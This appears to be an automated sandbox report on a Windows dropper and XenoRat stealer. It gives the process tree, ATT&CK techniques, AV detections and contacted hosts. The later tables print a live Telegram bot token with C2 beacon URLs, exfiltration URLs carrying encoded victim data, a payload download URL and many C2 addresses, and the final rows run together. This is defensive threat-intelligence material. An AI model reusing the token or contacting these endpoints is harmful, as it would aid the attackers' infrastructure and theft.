Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match | File source: 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 0LpFv1haTA.exe PID: 1964, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 0LpFv1haTA.exe PID: 5500, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: Process Memory Space: 0LpFv1haTA.exe PID: 1964, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 0LpFv1haTA.exe PID: 5500, type: MEMORYSTR
Source: Yara match | File source: 41.0.manager.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000029.00000000.2648249695.0000000000242000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: manager.exe PID: 8056, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\manager.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe, type: DROPPED
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 231 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Disable or Modify Tools | 1 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Command and Scripting Interpreter | 1 Scheduled Task/Job | 11 Process Injection | 1 Deobfuscate/Decode Files or Information | 1 Credentials in Registry | 134 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 11 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | Logon Script (Windows) | 1 Scheduled Task/Job | 2 Obfuscated Files or Information | Security Account Manager | 1 Query Registry | SMB/Windows Admin Shares | 1 Email Collection | 21 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Software Packing | NTDS | 441 Security Software Discovery | Distributed Component Object Model | 1 Clipboard Data | 11 Non-Standard Port | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Timestomp | LSA Secrets | 1 Process Discovery | SSH | Keylogging | 3 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 261 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | 114 Application Layer Protocol | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 File Deletion | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Masquerading | Proc Filesystem | 1 System Network Configuration Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 261 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 11 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Behavior Graph ID: 1520806 | Sample: 0LpFv1haTA.exe | Startdate: 27/09/2024 | Architecture: WINDOWS | Score: 100

Start
  DNS/IP: api.telegram.org (Uses the Telegram API (likely for C&C communication))
  DNS/IP: serveo.net
  DNS/IP: ip-api.com
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus / Scanner detection for submitted sample; 16 other signatures
  started: 0LpFv1haTA.exe 7
    dropped: C:\Users\user\AppData\...\0LpFv1haTA.exe, PE32
    dropped: C:\Users\...\0LpFv1haTA.exe:Zone.Identifier, ASCII
    dropped: C:\Users\user\AppData\...\0LpFv1haTA.exe.log, CSV
    Signatures: Found many strings related to Crypto-Wallets (likely being stolen); Self deletion via cmd or bat file
    started: cmd.exe 1
      Signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Uses netsh to modify the Windows network and firewall settings; Tries to harvest and steal WLAN passwords
      started: 0LpFv1haTA.exe 14 30
        DNS/IP: 188.120.242.78, 49739, 8817 THEFIRST-ASRU Russian Federation
        DNS/IP: api.telegram.org 149.154.167.220, 443, 49712, 49713 TELEGRAMRU United Kingdom
        DNS/IP: 7 other IPs or domains
        dropped: C:\Users\user\AppData\Roaming\manager.exe, PE32
        Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); 6 other signatures
        started: manager.exe
          dropped: C:\Users\user\AppData\Roaming\...\manager.exe, PE32
          Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
          started: manager.exe
            DNS/IP: 193.149.187.135, 4444, 49744, 49747 DANISCODK Denmark
            dropped: C:\Users\user\AppData\Local\...\tmp4A67.tmp, ASCII
            Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
            started: schtasks.exe
              started: conhost.exe
        started: cmd.exe
          Signatures: Tries to harvest and steal WLAN passwords
          started: conhost.exe
          started: chcp.com
          started: netsh.exe
          started: findstr.exe
        started: cmd.exe
          started: conhost.exe
          started: chcp.com
          started: 2 other processes
        started: ssh.exe
          DNS/IP: serveo.net 138.68.79.95, 22, 49707, 49710 DIGITALOCEAN-ASNUS United States
          started: conhost.exe
      started: conhost.exe
      started: timeout.exe 1
      started: 2 other processes
  started: 0LpFv1haTA.exe
    Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Tries to harvest and steal WLAN passwords
    started: cmd.exe
      started: conhost.exe
      started: chcp.com
      started: 2 other processes
    started: WerFault.exe
      dropped: C:\ProgramData\Microsoft\...\Report.wer, Unicode
    started: cmd.exe
      started: 4 other processes
    started: ssh.exe
      started: conhost.exe
  started: 0LpFv1haTA.exe
  started: 4 other processes

Source | Detection | Scanner | Label | Link
0LpFv1haTA.exe | 82% | ReversingLabs | Win32.Trojan.Mardom |
0LpFv1haTA.exe | 100% | Avira | TR/Dropper.Gen |
0LpFv1haTA.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | 100% | Avira | TR/Dropper.Gen |
C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\XenoManager\manager.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\manager.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | 82% | ReversingLabs | Win32.Trojan.Mardom |
C:\Users\user\AppData\Roaming\XenoManager\manager.exe | 92% | ReversingLabs | ByteCode-MSIL.Trojan.XenoRat |
C:\Users\user\AppData\Roaming\manager.exe | 92% | ReversingLabs | ByteCode-MSIL.Trojan.XenoRat |

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label | Link
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe |
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe |
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe |
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe |
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe |
http://upx.sf.net | 0% | URL Reputation | safe |
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe |
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | 0% | URL Reputation | safe |
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe |
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
serveo.net | 138.68.79.95 | true | false | | unknown
ip-api.com | 208.95.112.1 | true | false | | unknown
api.telegram.org | 149.154.167.220 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578472389&text=%23MSWINDOW%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E051829%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2F8f7482867cc6a5aec99ead5e72d7016e.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML | true | | unknown
http://ip-api.com/line?fields=query,country | false | | unknown
https://api.telegram.org/bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578472389&text=%23MSWINDOW%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E051829%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.13Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F188.120.242.78%3A8817%2Fget%2FJfGGV6ePde%2F9IYTn_user%40051829_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F188.120.242.78%3A8817%2Fget%2FJfGGV6ePde%2F9IYTn_user%40051829_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML | true | | unknown
http://185.253.7.60:8080//sendData?pk=MDM2MDQ3RTJFN0NDMTE4MjQzNkMzMUU0NEE4Nzg4QUU=&ta=TVNXSU5ET1c=&un=YWxmb25z&pc=MDUxODI5&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MQ== | true | | unknown
http://185.253.7.60:8080//mnemonic-verify/52F48616470571256761856660/036047E2E7CC1182436C31E44A8788AE | true | | unknown
http://185.80.128.17/manager.exe | false | | unknown
https://api.telegram.org/bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578472389&text=%23MSWINDOW%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E051829%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2F0bdcbb891d3c57c2a3bd914febf5955f.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML | true | | unknown
193.149.187.135 | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/ac/?q= | 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://185.217.98.121:80 | 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://138.2.92.67:443 | 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://api.telegram.org | 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449E74000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449EA8000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
https://api.telegram.org/bot | 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449E74000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
http://176.9.149.76:8051 | 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://202.120.7.24:54321 | 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://123.30.140.234:9080 | 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://20.78.55.47:8080 | 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://167.99.138.249:8080/K7IvH_user%40051829_report.wsr | 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ED9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://185.253.7.60:8080 | 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F1126B000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449E5E000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://107.161.20.142:8080 | 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://5.196.181.135:443 | 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://44.228.161.50:443 | 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://8f7482867cc6a5aec99ead5e72d7016e.serveo.net/ | 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ECD000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449EC9000.00000004.00000800.00020000.00000000.sdmp, ssh.exe, 0000001F.00000002.4563063171.000001E39F291000.00000004.00000020.00020000.00000000.sdmp, ssh.exe, 0000001F.00000002.4563063171.000001E39F239000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://8f7482867cc6a5aec99ead5e72d7016e.serveo.net | 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ECD000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449DCF000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449EC9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://192.99.196.191:443 | 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://167.99.138.249:80802 | 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ED9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://0bdcbb891d3c57c2a3bd914febf5955f.serveo.net | 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F1126B000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://18.228.80.130:80 | 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://167.99.138.249 | 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ED9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://194.5.152.106:8080 | 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
                                                                                      unknown
                                                                                      http://66.42.56.128:800LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459D6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://167.99.138.249:80800LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          http://ip-api.com0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449DCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            http://51.178.38.93:80800LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              http://185.253.7.60:808020LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449E5E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                unknown
